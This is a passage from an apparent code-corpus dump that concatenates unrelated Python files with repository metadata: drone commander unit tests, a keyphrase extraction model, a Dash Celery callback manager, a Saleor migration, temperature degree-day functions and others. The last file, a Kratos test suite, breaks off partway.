# optimise o = tf.train.AdamOptimizer(LEARNING_RATE, beta1=0.9,beta2=0.99) print("start time = ", time.strftime('%X %x %Z')) m.fit(data, o, var_steps = VAR_STEPS, epochs = EPOCHS, batch_size = BATCH_SIZE, display_step=DISPLAY_STEP, test = test, loss = error_rate, tolerance = TOL, max_time=MAXTIME ) print("optimisation complete") # export final predicted values and loss metrics ypred = m.predict(test.X, batch_size = BATCH_SIZE) #same batchsize used for convenience np.savetxt("predictions.csv", np.concatenate(ypred, axis=1), delimiter=",") if save_nlpds == True: nlpd_samples, nlpd_meanvar = m.nlpd_samples(test.X, test.Y, batch_size = BATCH_SIZE) try: np.savetxt("nlpd_meanvar.csv", nlpd_meanvar, delimiter=",") # N x 2P as for predictions except: print('nlpd_meanvar export fail') try: np.savetxt("nlpd_samples.csv", nlpd_samples, delimiter=",") # NP x S (NxS concat for P tasks) except: print('nlpd_samples export fail') print("Final " + error_rate.get_name() + "=" + "%.4f" % error_rate.eval(test.Y, ypred[0])) print("Final " + "generalised_nlpd" + "=" + "%.4f" % m.nlpd_general(test.X, test.Y, batch_size = BATCH_SIZE)) error_rate_end = [losses.MeanAbsError(data.Dout)] # any extra accuracy measures at end of routine print("Final ", [e.get_name() for e in error_rate_end]) print([e.eval(test.Y, ypred[0]) for e in error_rate_end]) predvar = [np.mean(np.mean(ypred[1]))] print("Final predvar ", predvar) with open("final_losses.csv", 'w', newline='') as f: csv.writer(f).writerows([[e.get_name() for e in error_rate_end] + ['pred_var'], [e.eval(test.Y, ypred[0]) for e in error_rate_end] + predvar]) print("finish time = " + time.strftime('%X %x %Z'))
2.453125
2
cruiser-lib/test/positioning/test_position_hl_commander.py
cfreebuf/kubeedge-examples
0
1807
<gh_stars>0 # -*- coding: utf-8 -*- # # || ____ _ __ # +------+ / __ )(_) /_______________ _____ ___ # | 0xBC | / __ / / __/ ___/ ___/ __ `/_ / / _ \ # +------+ / /_/ / / /_/ /__/ / / /_/ / / /_/ __/ # || || /_____/_/\__/\___/_/ \__,_/ /___/\___/ # # Copyright (C) 2018 Bitcraze AB # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. import math import sys import unittest from cflib.crazyflie import Crazyflie from cflib.crazyflie import HighLevelCommander from cflib.crazyflie import Param from cflib.positioning.position_hl_commander import PositionHlCommander if sys.version_info < (3, 3): from mock import MagicMock, patch, call else: from unittest.mock import MagicMock, patch, call @patch('time.sleep') class TestPositionHlCommander(unittest.TestCase): def setUp(self): self.commander_mock = MagicMock(spec=HighLevelCommander) self.param_mock = MagicMock(spec=Param) self.cf_mock = MagicMock(spec=Crazyflie) self.cf_mock.high_level_commander = self.commander_mock self.cf_mock.param = self.param_mock self.cf_mock.is_connected.return_value = True self.sut = PositionHlCommander(self.cf_mock) def test_that_the_estimator_is_reset_on_take_off( self, sleep_mock): # Fixture sut = PositionHlCommander(self.cf_mock, 1.0, 2.0, 3.0) # Test sut.take_off() # Assert self.param_mock.set_value.assert_has_calls([ call('kalman.initialX', '{:.2f}'.format(1.0)), call('kalman.initialY', '{:.2f}'.format(2.0)), call('kalman.initialZ', '{:.2f}'.format(3.0)), call('kalman.resetEstimation', '1'), call('kalman.resetEstimation', '0') ]) def test_that_the_hi_level_commander_is_activated_on_take_off( self, sleep_mock): # Fixture # Test self.sut.take_off() # Assert self.param_mock.set_value.assert_has_calls([ call('commander.enHighLevel', '1') ]) def test_that_controller_is_selected_on_take_off( self, sleep_mock): # Fixture self.sut.set_controller(PositionHlCommander.CONTROLLER_MELLINGER) # Test self.sut.take_off() # Assert self.param_mock.set_value.assert_has_calls([ call('stabilizer.controller', '2') ]) def test_that_take_off_raises_exception_if_not_connected( self, sleep_mock): # Fixture self.cf_mock.is_connected.return_value = False # Test # Assert with self.assertRaises(Exception): self.sut.take_off() def test_that_take_off_raises_exception_when_already_flying( self, sleep_mock): # Fixture self.sut.take_off() # Test # Assert with self.assertRaises(Exception): self.sut.take_off() def test_that_it_goes_up_on_take_off( self, sleep_mock): # Fixture # Test self.sut.take_off(height=0.4, velocity=0.6) # Assert duration = 0.4 / 0.6 self.commander_mock.takeoff.assert_called_with(0.4, duration) sleep_mock.assert_called_with(duration) def test_that_it_goes_up_to_default_height( self, sleep_mock): # Fixture sut = PositionHlCommander(self.cf_mock, default_height=0.4) # Test sut.take_off(velocity=0.6) # Assert duration = 0.4 / 0.6 self.commander_mock.takeoff.assert_called_with(0.4, duration) sleep_mock.assert_called_with(duration) def test_that_it_goes_down_on_landing( self, sleep_mock): # Fixture self.sut.take_off(height=0.4) # Test self.sut.land(velocity=0.6) # Assert duration = 0.4 / 0.6 self.commander_mock.land.assert_called_with(0.0, duration) sleep_mock.assert_called_with(duration) def test_that_it_takes_off_and_lands_as_context_manager( self, sleep_mock): # Fixture # Test with self.sut: pass # Assert duration1 = 0.5 / 0.5 duration2 = 0.5 / 0.5 self.commander_mock.takeoff.assert_called_with(0.5, duration1) self.commander_mock.land.assert_called_with(0.0, duration2) sleep_mock.assert_called_with(duration1) sleep_mock.assert_called_with(duration2) def test_that_it_returns_current_position( self, sleep_mock): # Fixture self.sut.take_off(height=0.4, velocity=0.6) # Test actual = self.sut.get_position() # Assert self.assertEqual(actual, (0.0, 0.0, 0.4)) def test_that_it_goes_to_position( self, sleep_mock): # Fixture self.sut.take_off() inital_pos = self.sut.get_position() # Test self.sut.go_to(1.0, 2.0, 3.0, 4.0) # Assert distance = self._distance(inital_pos, (1.0, 2.0, 3.0)) duration = distance / 4.0 self.commander_mock.go_to.assert_called_with( 1.0, 2.0, 3.0, 0.0, duration) sleep_mock.assert_called_with(duration) def test_that_it_moves_distance( self, sleep_mock): # Fixture self.sut.take_off() inital_pos = self.sut.get_position() # Test self.sut.move_distance(1.0, 2.0, 3.0, 4.0) # Assert distance = self._distance((0.0, 0.0, 0.0), (1.0, 2.0, 3.0)) duration = distance / 4.0 final_pos = ( inital_pos[0] + 1.0, inital_pos[1] + 2.0, inital_pos[2] + 3.0) self.commander_mock.go_to.assert_called_with( final_pos[0], final_pos[1], final_pos[2], 0.0, duration) sleep_mock.assert_called_with(duration) def test_that_it_goes_forward( self, sleep_mock): # Fixture self.sut.take_off() inital_pos = self.sut.get_position() # Test self.sut.forward(1.0, 2.0) # Assert duration = 1.0 / 2.0 final_pos = ( inital_pos[0] + 1.0, inital_pos[1], inital_pos[2]) self.commander_mock.go_to.assert_called_with( final_pos[0], final_pos[1], final_pos[2], 0.0, duration) sleep_mock.assert_called_with(duration) def test_that_it_goes_back( self, sleep_mock): # Fixture self.sut.take_off() inital_pos = self.sut.get_position() # Test self.sut.back(1.0, 2.0) # Assert duration = 1.0 / 2.0 final_pos = ( inital_pos[0] - 1.0, inital_pos[1], inital_pos[2]) self.commander_mock.go_to.assert_called_with( final_pos[0], final_pos[1], final_pos[2], 0.0, duration) sleep_mock.assert_called_with(duration) def test_that_it_goes_left( self, sleep_mock): # Fixture self.sut.take_off() inital_pos = self.sut.get_position() # Test self.sut.left(1.0, 2.0) # Assert duration = 1.0 / 2.0 final_pos = ( inital_pos[0], inital_pos[1] + 1.0, inital_pos[2]) self.commander_mock.go_to.assert_called_with( final_pos[0], final_pos[1], final_pos[2], 0.0, duration) sleep_mock.assert_called_with(duration) def test_that_it_goes_right( self, sleep_mock): # Fixture self.sut.take_off() inital_pos = self.sut.get_position() # Test self.sut.right(1.0, 2.0) # Assert duration = 1.0 / 2.0 final_pos = ( inital_pos[0], inital_pos[1] - 1, inital_pos[2]) self.commander_mock.go_to.assert_called_with( final_pos[0], final_pos[1], final_pos[2], 0, duration) sleep_mock.assert_called_with(duration) def test_that_it_goes_up( self, sleep_mock): # Fixture self.sut.take_off() inital_pos = self.sut.get_position() # Test self.sut.up(1.0, 2.0) # Assert duration = 1.0 / 2.0 final_pos = ( inital_pos[0], inital_pos[1], inital_pos[2] + 1) self.commander_mock.go_to.assert_called_with( final_pos[0], final_pos[1], final_pos[2], 0, duration) sleep_mock.assert_called_with(duration) def test_that_it_goes_down( self, sleep_mock): # Fixture self.sut.take_off() inital_pos = self.sut.get_position() # Test self.sut.down(1.0, 2.0) # Assert duration = 1.0 / 2.0 final_pos = ( inital_pos[0], inital_pos[1], inital_pos[2] - 1) self.commander_mock.go_to.assert_called_with( final_pos[0], final_pos[1], final_pos[2], 0, duration) sleep_mock.assert_called_with(duration) def test_that_default_velocity_is_used( self, sleep_mock): # Fixture self.sut.take_off() inital_pos = self.sut.get_position() self.sut.set_default_velocity(7) # Test self.sut.go_to(1.0, 2.0, 3.0) # Assert distance = self._distance(inital_pos, (1.0, 2.0, 3.0)) duration = distance / 7.0 self.commander_mock.go_to.assert_called_with( 1.0, 2.0, 3.0, 0.0, duration) sleep_mock.assert_called_with(duration) def test_that_default_height_is_used( self, sleep_mock): # Fixture self.sut.take_off() inital_pos = self.sut.get_position() self.sut.set_default_velocity(7.0) self.sut.set_default_height(5.0) # Test self.sut.go_to(1.0, 2.0) # Assert distance = self._distance(inital_pos, (1.0, 2.0, 5.0)) duration = distance / 7.0 self.commander_mock.go_to.assert_called_with( 1.0, 2.0, 5.0, 0.0, duration) sleep_mock.assert_called_with(duration) ###################################################################### def _distance(self, p1, p2): dx = p1[0] - p2[0] dy = p1[1] - p2[1] dz = p1[2] - p2[2] return math.sqrt(dx * dx + dy * dy + dz * dz) if __name__ == '__main__': unittest.main()
1.984375
2
onmt/keyphrase/pke/unsupervised/graph_based/expandrank.py
NaomiatLibrary/OpenNMT-kpg-release
152
1808
#!/usr/bin/env python # -*- coding: utf-8 -*- # Author: <NAME> # Date: 10-02-2018 """ExpandRank keyphrase extraction model. Graph-based ranking approach to keyphrase extraction described in: * <NAME> and <NAME>. Single Document Keyphrase Extraction Using Neighborhood Knowledge. *In proceedings of AAAI*, pages 855-860, 2008. """ from __future__ import print_function from __future__ import division from __future__ import unicode_literals from __future__ import absolute_import from onmt.keyphrase.pke.unsupervised import SingleRank from onmt.keyphrase.pke.base import LoadFile import networkx as nx import logging class ExpandRank(SingleRank): """ExpandRank keyphrase extraction model. Parameterized example:: import pke import string from nltk.corpus import stopwords # 1. create an ExpandRank extractor. extractor = pke.unsupervised.ExpandRank() # 2. load the content of the document. extractor.load_document(input='path/to/input.xml') # 3. select the the longest sequences of nouns and adjectives, that do # not contain punctuation marks or stopwords as candidates. pos = {'NOUN', 'PROPN', 'ADJ'} stoplist = list(string.punctuation) stoplist += ['-lrb-', '-rrb-', '-lcb-', '-rcb-', '-lsb-', '-rsb-'] stoplist += stopwords.words('english') extractor.candidate_selection(pos=pos, stoplist=stoplist) # 4. weight the candidates using the sum of their word's scores that are # computed using random walk. In the graph, nodes are words (nouns # and adjectives only) that are connected if they occur in a window # of 10 words. A set of extra documents should be provided to expand # the graph. expanded_documents = [('path/to/input1.xml', similarity1), ('path/to/input2.xml', similarity2)] extractor.candidate_weighting(window=10, pos=pos, expanded_documents=expanded_documents, format='corenlp') # 5. get the 10-highest scored candidates as keyphrases keyphrases = extractor.get_n_best(n=10) """ def __init__(self): """ Redefining initializer for ExpandRank. """ super(ExpandRank, self).__init__() def expand_word_graph(self, input_file, similarity, window=10, pos=None): """Expands the word graph using the given document. Args: input_file (str): path to the input file. similarity (float): similarity for weighting edges. window (int): the window within the sentence for connecting two words in the graph, defaults to 10. pos (set): the set of valid pos for words to be considered as nodes in the graph, defaults to ('NOUN', 'PROPN', 'ADJ'). """ # define default pos tags set if pos is None: pos = {'NOUN', 'PROPN', 'ADJ'} # initialize document loader doc = LoadFile() # read document doc.load_document(input=input_file, language=self.language, normalization=self.normalization) # flatten document and initialize nodes sequence = [] for sentence in doc.sentences: for j, node in enumerate(sentence.stems): if node not in self.graph and sentence.pos[j] in pos: self.graph.add_node(node) sequence.append((node, sentence.pos[j])) # loop through sequence to build the edges in the graph for j, node_1 in enumerate(sequence): for k in range(j + 1, min(j + window, len(sequence))): node_2 = sequence[k] if node_1[1] in pos and node_2[1] in pos \ and node_1[0] != node_2[0]: if not self.graph.has_edge(node_1[0], node_2[0]): self.graph.add_edge(node_1[0], node_2[0], weight=0) self.graph[node_1[0]][node_2[0]]['weight'] += similarity def candidate_weighting(self, window=10, pos=None, expanded_documents=None, normalized=False): """Candidate ranking using random walk. Args: window (int): the window within the sentence for connecting two words in the graph, defaults to 10. pos (set): the set of valid pos for words to be considered as nodes in the graph, defaults to ('NOUN', 'PROPN', 'ADJ'). expanded_documents (list): the set of documents to expand the graph, should be a list of tuples (input_path, similarity). Defaults to empty list, i.e. no expansion. normalized (False): normalize keyphrase score by their length, defaults to False. """ # define default pos tags set if pos is None: pos = {'NOUN', 'PROPN', 'ADJ'} if expanded_documents is None: expanded_documents = [] logging.warning('No neighbor documents provided for ExpandRank.') # build the word graph self.build_word_graph(window=window, pos=pos) # expand the word graph for input_file, similarity in expanded_documents: self.expand_word_graph(input_file=input_file, similarity=similarity, window=window, pos=pos) # compute the word scores using random walk w = nx.pagerank_scipy(self.graph, alpha=0.85, weight='weight') # loop through the candidates for k in self.candidates.keys(): tokens = self.candidates[k].lexical_form self.weights[k] = sum([w[t] for t in tokens]) if normalized: self.weights[k] /= len(tokens)
2.875
3
5-serverless-xray-stack/app.py
mmeidlinger/cdk-microservices-labs
14
1809
<reponame>mmeidlinger/cdk-microservices-labs #!/usr/bin/env python3 from aws_cdk import core from fagate_serverless.fagate_serverless_stack import FagateServerlessStack app = core.App() FagateServerlessStack(app, "serverless-xray-stack") app.synth()
1.242188
1
dash/long_callback/managers/celery_manager.py
nickmelnikov82/dash
17,143
1810
import json import inspect import hashlib from _plotly_utils.utils import PlotlyJSONEncoder from dash.long_callback.managers import BaseLongCallbackManager class CeleryLongCallbackManager(BaseLongCallbackManager): def __init__(self, celery_app, cache_by=None, expire=None): """ Long callback manager that runs callback logic on a celery task queue, and stores results using a celery result backend. :param celery_app: A celery.Celery application instance that must be configured with a result backend. See the celery documentation for information on configuration options. :param cache_by: A list of zero-argument functions. When provided, caching is enabled and the return values of these functions are combined with the callback function's input arguments and source code to generate cache keys. :param expire: If provided, a cache entry will be removed when it has not been accessed for ``expire`` seconds. If not provided, the lifetime of cache entries is determined by the default behavior of the celery result backend. """ try: import celery # pylint: disable=import-outside-toplevel,import-error from celery.backends.base import ( # pylint: disable=import-outside-toplevel,import-error DisabledBackend, ) except ImportError as missing_imports: raise ImportError( """\ CeleryLongCallbackManager requires extra dependencies which can be installed doing $ pip install "dash[celery]"\n""" ) from missing_imports if not isinstance(celery_app, celery.Celery): raise ValueError("First argument must be a celery.Celery object") if isinstance(celery_app.backend, DisabledBackend): raise ValueError("Celery instance must be configured with a result backend") super().__init__(cache_by) self.handle = celery_app self.expire = expire def terminate_job(self, job): if job is None: return self.handle.control.terminate(job) def terminate_unhealthy_job(self, job): task = self.get_task(job) if task and task.status in ("FAILURE", "REVOKED"): return self.terminate_job(job) return False def job_running(self, job): future = self.get_task(job) return future and future.status in ( "PENDING", "RECEIVED", "STARTED", "RETRY", "PROGRESS", ) def make_job_fn(self, fn, progress, args_deps): return _make_job_fn(fn, self.handle, progress, args_deps) def get_task(self, job): if job: return self.handle.AsyncResult(job) return None def clear_cache_entry(self, key): self.handle.backend.delete(key) def call_job_fn(self, key, job_fn, args): task = job_fn.delay(key, self._make_progress_key(key), args) return task.task_id def get_progress(self, key): progress_key = self._make_progress_key(key) progress_data = self.handle.backend.get(progress_key) if progress_data: return json.loads(progress_data) return None def result_ready(self, key): return self.handle.backend.get(key) is not None def get_result(self, key, job): # Get result value result = self.handle.backend.get(key) if result is None: return None result = json.loads(result) # Clear result if not caching if self.cache_by is None: self.clear_cache_entry(key) else: if self.expire: # Set/update expiration time self.handle.backend.expire(key, self.expire) self.clear_cache_entry(self._make_progress_key(key)) self.terminate_job(job) return result def _make_job_fn(fn, celery_app, progress, args_deps): cache = celery_app.backend # Hash function source and module to create a unique (but stable) celery task name fn_source = inspect.getsource(fn) fn_str = fn_source fn_hash = hashlib.sha1(fn_str.encode("utf-8")).hexdigest() @celery_app.task(name=f"long_callback_{fn_hash}") def job_fn(result_key, progress_key, user_callback_args, fn=fn): def _set_progress(progress_value): cache.set(progress_key, json.dumps(progress_value, cls=PlotlyJSONEncoder)) maybe_progress = [_set_progress] if progress else [] if isinstance(args_deps, dict): user_callback_output = fn(*maybe_progress, **user_callback_args) elif isinstance(args_deps, (list, tuple)): user_callback_output = fn(*maybe_progress, *user_callback_args) else: user_callback_output = fn(*maybe_progress, user_callback_args) cache.set(result_key, json.dumps(user_callback_output, cls=PlotlyJSONEncoder)) return job_fn
2.265625
2
libraries/botframework-connector/botframework/connector/token_api/_token_api_client.py
victor-kironde/botbuilder-python
10
1811
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.service_client import SDKClient from msrest import Serializer, Deserializer from ._configuration import TokenApiClientConfiguration from .operations import BotSignInOperations from .operations import UserTokenOperations from . import models class TokenApiClient(SDKClient): """TokenApiClient :ivar config: Configuration for client. :vartype config: TokenApiClientConfiguration :ivar bot_sign_in: BotSignIn operations :vartype bot_sign_in: botframework.tokenapi.operations.BotSignInOperations :ivar user_token: UserToken operations :vartype user_token: botframework.tokenapi.operations.UserTokenOperations :param credentials: Subscription credentials which uniquely identify client subscription. :type credentials: None :param str base_url: Service URL """ def __init__(self, credentials, base_url=None): self.config = TokenApiClientConfiguration(credentials, base_url) super(TokenApiClient, self).__init__(self.config.credentials, self.config) client_models = { k: v for k, v in models.__dict__.items() if isinstance(v, type) } self.api_version = "token" self._serialize = Serializer(client_models) self._deserialize = Deserializer(client_models) self.bot_sign_in = BotSignInOperations( self._client, self.config, self._serialize, self._deserialize ) self.user_token = UserTokenOperations( self._client, self.config, self._serialize, self._deserialize )
1.695313
2
soppi/sample.py
shikshan/soppi
0
1812
# content of test_sample.py def inc(x: int) -> int: return x + 1
1.71875
2
saleor/order/migrations/0081_auto_20200406_0456.py
fairhopeweb/saleor
15,337
1813
<gh_stars>1000+ # Generated by Django 3.0.4 on 2020-04-06 09:56 from django.db import migrations from saleor.order import OrderStatus def match_orders_with_users(apps, *_args, **_kwargs): Order = apps.get_model("order", "Order") User = apps.get_model("account", "User") orders_without_user = Order.objects.filter( user_email__isnull=False, user=None ).exclude(status=OrderStatus.DRAFT) for order in orders_without_user: try: new_user = User.objects.get(email=order.user_email) except User.DoesNotExist: continue order.user = new_user order.save(update_fields=["user"]) class Migration(migrations.Migration): dependencies = [ ("order", "0080_invoice"), ] operations = [ migrations.RunPython(match_orders_with_users), ]
2.140625
2
function/python/brightics/function/textanalytics/regex.py
jhpark428/studio
202
1814
""" Copyright 2019 Samsung SDS Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from brightics.common.utils import check_required_parameters from brightics.common.exception import BrighticsFunctionException from .data import regex_format_dict import re def regex(table, **params): check_required_parameters(_regex, params, ['table']) return _regex(table, **params) def _regex(table, input_cols, transformation_mode='extract', find_mode='all', pattern='', user_dict_pattern='', custom_pattern='', replacement_string='', user_dict=None): out_table = table.copy() pattern_dict = regex_format_dict.pattern_dict user_pattern_dict = {} if user_dict is not None: user_patterns = user_dict.values for user_pattern in user_patterns: user_pattern_name = user_pattern[0] user_pattern_content = user_pattern[1] user_pattern_dict[user_pattern_name] = user_pattern_dict.get(user_pattern_name, []) + [user_pattern_content] user_pattern_dict = {key: r'|'.join(value) for key, value in user_pattern_dict.items()} if pattern == '': raise BrighticsFunctionException.from_errors([{'0100': "Please choose a pattern."}]) if pattern == 'custom': raw_pattern = custom_pattern elif pattern == 'user_dictionary': raw_pattern = user_pattern_dict.get(user_dict_pattern) if raw_pattern is None: raise BrighticsFunctionException.from_errors( [{'0100': user_dict_pattern + " is not a valid pattern name in the user dictionary."}]) else: raw_pattern = pattern_dict.get(pattern) regex_pattern = re.compile(raw_pattern) def transformation(text): if transformation_mode == 'extract': if find_mode == 'first': result = regex_pattern.search(text) if result is None: return "" else: return result.group() else: # find_mode == 'all' return regex_pattern.findall(text) elif transformation_mode == 'replace': if find_mode == 'first': return regex_pattern.sub(replacement_string, text, 1) else: # find_mode == 'all' return regex_pattern.sub(replacement_string, text) elif transformation_mode == 'remove': if find_mode == 'first': return regex_pattern.sub("", text, 1) else: # find_mode == 'all' return regex_pattern.sub("", text) else: # transformation_mode == 'split' if find_mode == 'first': return regex_pattern.split(text, 1) else: # find_mode == 'all' return regex_pattern.split(text) for col in input_cols: result_col = table[col].apply(transformation) out_table['regex_' + col] = result_col return {'out_table': out_table}
2.15625
2
bin/temperature_functions.py
travc/outbreak-reporter
0
1815
#!/usr/bin/env python3 import sys import os import logging import numpy as np import pandas as pd import dateutil def tempF2C(x): return (x-32.0)*5.0/9.0 def tempC2F(x): return (x*9.0/5.0)+32.0 def load_temperature_hdf5(temps_fn, local_time_offset, basedir=None, start_year=None, truncate_to_full_day=False): ## Load temperature # temps_fn = "{}_AT_cleaned.h5".format(station_callsign) logging.info("Using saved temperatures file '{}'".format(temps_fn)) if basedir is not None: temps_fn = os.path.join(basedir, temps_fn) tempdf = pd.read_hdf(temps_fn, 'table') tmp = local_time_offset.split(':') tmp = int(tmp[0])*3600+int(tmp[1])*60 sitetz = dateutil.tz.tzoffset(local_time_offset, tmp) tempdf.index = tempdf.index.tz_convert(sitetz) if truncate_to_full_day: x = tempdf.index[-1] if x.hour != 23: x = x-pd.Timedelta(days=1) tmp = '{:04d}-{:02d}-{:02d}'.format(x.year, x.month, x.day) tempdf = tempdf.loc[:tmp] if start_year is not None: tempdf = tempdf.loc['{}-01-01'.format(start_year):] logging.info("Temperature data date range used: {} through {}".format(tempdf.index[0], tempdf.index[-1])) return tempdf def load_temperature_csv(fn, local_time_offset=None): t = pd.read_csv(fn, index_col=0) if local_time_offset is not None: tmp = local_time_offset.split(':') tmp = int(tmp[0])*3600+int(tmp[1])*60 sitetz = dateutil.tz.tzoffset(local_time_offset, tmp) #t.index = pd.to_datetime(t.index).tz_localize('UTC').tz_convert(sitetz) # @TCC this fails if csv contains datetimes with TZ t.index = pd.to_datetime(t.index) try: t.index = t.index.tz_localize('UTC') except TypeError: pass t.index = t.index.tz_convert(sitetz) return t # Function which computes BM (single sine method) degree day generation from temperature data def compute_BMDD_Fs(tmin, tmax, base_temp, dd_gen): # Used internally def _compute_daily_BM_DD(mint, maxt, avet, base_temp): """Use standard Baskerville-Ermin (single sine) degree-day method to compute the degree-day values for each a single day. """ if avet is None: avet = (mint+maxt)/2.0 # simple midpoint (like in the refs) dd = np.nan # value which we're computing # Step 1: Adjust for observation time; not relevant # Step 2: GDD = 0 if max < base (curve all below base) if maxt < base_temp: dd = 0 # Step 3: Calc mean temp for day; already done previously # Step 4: min > base; then whole curve counts elif mint >= base_temp: dd = avet - base_temp # Step 5: else use curve minus part below base else: W = (maxt-mint)/2.0 tmp = (base_temp-avet) / W if tmp < -1: print('WARNING: (base_temp-avet)/W = {} : should be [-1:1]'.format(tmp)) tmp = -1 if tmp > 1: print('WARNING: (base_temp-avet)/W = {} : should be [-1:1]'.format(tmp)) tmp = 1 A = np.arcsin(tmp) dd = ((W*np.cos(A))-((base_temp-avet)*((np.pi/2.0)-A)))/np.pi return dd # compute the degree-days for each day in the temperature input (from tmin and tmax vectors) dd = pd.concat([tmin,tmax], axis=1) dd.columns = ['tmin', 'tmax'] dd['DD'] = dd.apply(lambda x: _compute_daily_BM_DD(x[0], x[1], (x[0]+x[1])/2.0, base_temp), axis=1) # compute the degree-days for each day in the temperature input (from a daily groupby) # grp = t.groupby(pd.TimeGrouper('D')) # dd = grp.agg(lambda x: _compute_daily_BM_DD(np.min(x), np.max(x), None, base_temp)) # dd.columns = ['DD'] # Find the point where cumulative sums of degree days cross the threshold cDD = dd['DD'].cumsum(skipna=True) for cumdd_threshold,label in [[1*dd_gen,'F1'], [2*dd_gen,'F2'], [3*dd_gen,'F3']]: dtmp = np.zeros(len(dd['DD']))*np.nan tmp = np.searchsorted(cDD, cDD+(cumdd_threshold)-dd['DD'], side='left').astype(float) tmp[tmp>=len(tmp)] = np.nan #dd[label+'_idx'] = tmp # convert those indexes into end times e = pd.Series(index=dd.index, dtype='float64')#, dtype='datetime64[ns]') #e[~np.isnan(tmp)] = dd.index[tmp[~np.isnan(tmp)].astype(int)] # @TCC previous code e.loc[~np.isnan(tmp)] = dd.index[tmp[~np.isnan(tmp)].astype(int)] e.loc[np.isnan(tmp)] = np.nan dd[label+'_end'] = e # and duration... #dd[label] = (e-dd.index+pd.Timedelta(days=1)).apply(lambda x: np.nan if pd.isnull(x) else x.days) # @TCC previous code dd[label] = (pd.to_datetime(e)-dd.index+pd.Timedelta(days=1)).apply(lambda x: np.nan if pd.isnull(x) else x.days) #dd.loc[np.isnan(tmp), label] = np.nan print("DD dataframe min values\n", dd.min()) return dd def compute_year_over_year_norm(in_dataframe, start, end, norm_start=None, norm_end=None, freq='daily', interp_method='linear', norm_method='mean'): """ Parameters ---------- start: convertable to Datetime start range of dates to output end: convertable to Datetime end range of dates to output norm_start : convertable to Datetime or None `None` will use in_dataframe.index[0] norm_end : convertable to Datetime or None if given (not None), output range does not include `norm_end` (it is half-open) `None` will use in_dataframe.index[-1] freq : {'daily', 'hourly'} interp_method : str or None `None` will skip resample and interpolation, so `in_dataframe` must already be daily or hourly (depending on `freq`)! norm_method : {'mean', 'median'} """ if freq == 'hourly': hrs = 24 hrs_freq = '1h' elif freq == 'daily': hrs = 1 hrs_freq = '24h' else: raise ValueError("Invalid `freq` argument value: {}".format(freq)) if norm_start is None: norm_start = in_dataframe.index[0] if norm_end is None: norm_end = in_dataframe.index[-1] else: norm_end = pd.to_datetime([norm_end])[0] - pd.Timedelta('1 second') print('Computing using range:', norm_start, 'to', norm_end) if interp_method is None: # skip resample+interpolation (assumes in_dataframe is daily!) t = in_dataframe.loc[norm_start:norm_end] else: # resample and interpolate to get hourly t = in_dataframe.resample(hrs_freq).interpolate(method=interp_method).loc[norm_start:norm_end] if norm_method == 'mean': norm = t.groupby([t.index.month, t.index.day, t.index.hour]).mean().sort_index() elif norm_method == 'median': norm = t.groupby([t.index.month, t.index.day, t.index.hour]).median().sort_index() else: assert False, "Error: Unknown norm_method '{}'".format(norm_method) # now replicate and trim to the desired output range start = pd.to_datetime(start) end = pd.to_datetime(end) # need a non-leapyear and leapyear version norm_ly = norm.copy() if norm.shape[0] == 366*hrs: norm = norm.drop((2,29,)) else: # norm doesn't include any leapyear data assert norm.shape[0] == 365*hrs # make Feb 29 the mean of Feb 28 and Mar 1 foo = (norm.loc[(2,28,)] + norm.loc[(3,1,)]) / 2.0 foo.index = pd.MultiIndex.from_product( ([2],[29],list(range(hrs))) ) norm_ly = pd.concat((norm_ly,foo)).sort_index() norm_ly.sort_index(inplace=True) # probably not needed # build up a 'long normal' (lnorm) dataframe year by year by appending the norm or norm_ly lnorm = None for yr in np.arange(start.year, end.year+1): #print(yr) idx = pd.date_range(start='{}-{:02d}-{:02d} {:02d}:00:00'.format(yr,*norm.index[0]), end= '{}-{:02d}-{:02d} {:02d}:00:00'.format(yr,*norm.index[-1]), freq=hrs_freq) if idx.shape[0] == 366*hrs: foo = norm_ly.copy() else: assert norm.shape[0] == 365*hrs foo = norm.copy() foo.index = idx if lnorm is None: lnorm = foo else: lnorm = lnorm.append(foo) return lnorm.loc[start:end]
2.546875
3
applications/CSharpWrapperApplication/tests/test_CSharpWrapperApplication.py
lkusch/Kratos
778
1816
# import Kratos import KratosMultiphysics import KratosMultiphysics.StructuralMechanicsApplication as StructuralMechanicsApplication import KratosMultiphysics.CSharpWrapperApplication as CSharpWrapperApplication import run_cpp_unit_tests # Import Kratos "wrapper" for unittests import KratosMultiphysics.KratosUnittest as KratosUnittest # Import subprocess import subprocess # Using kratos_utilities import KratosMultiphysics.kratos_utilities as kratos_utilities if kratos_utilities.CheckIfApplicationsAvailable("ExternalSolversApplication"): has_external_solvers_application = True else: has_external_solvers_application = False # Import the tests o test_classes to create the suits ## SMALL TESTS ## NIGTHLY TESTS ## VALIDATION TESTS def AssembleTestSuites(): ''' Populates the test suites to run. Populates the test suites to run. At least, it should pupulate the suites: "small", "nighlty" and "all" Return ------ suites: A dictionary of suites The set of suites with its test_cases added. ''' suites = KratosUnittest.KratosSuites # Create a test suit with the selected tests (Small tests): smallSuite = suites['small'] # Create a test suit with the selected tests plus all small tests nightlySuite = suites['nightly'] ### BEGIN SMALL SUITE ### ### END SMALL SUITE ### ### BEGIN NIGHTLY SUITE ### ### END VALIDATION SUITE ### ### BEGIN VALIDATION SUITE ### # For very long tests that should not be in nighly and you can use to validate validationSuite = suites['validation'] validationSuite.addTests(nightlySuite) ### END VALIDATION ### # Create a test suit that contains all the tests: allSuite = suites['all'] allSuite.addTests(nightlySuite) # Already contains the smallSuite validationSuite.addTests(allSuite) # Validation contains all # Manual list for debugging #allSuite.addTests( 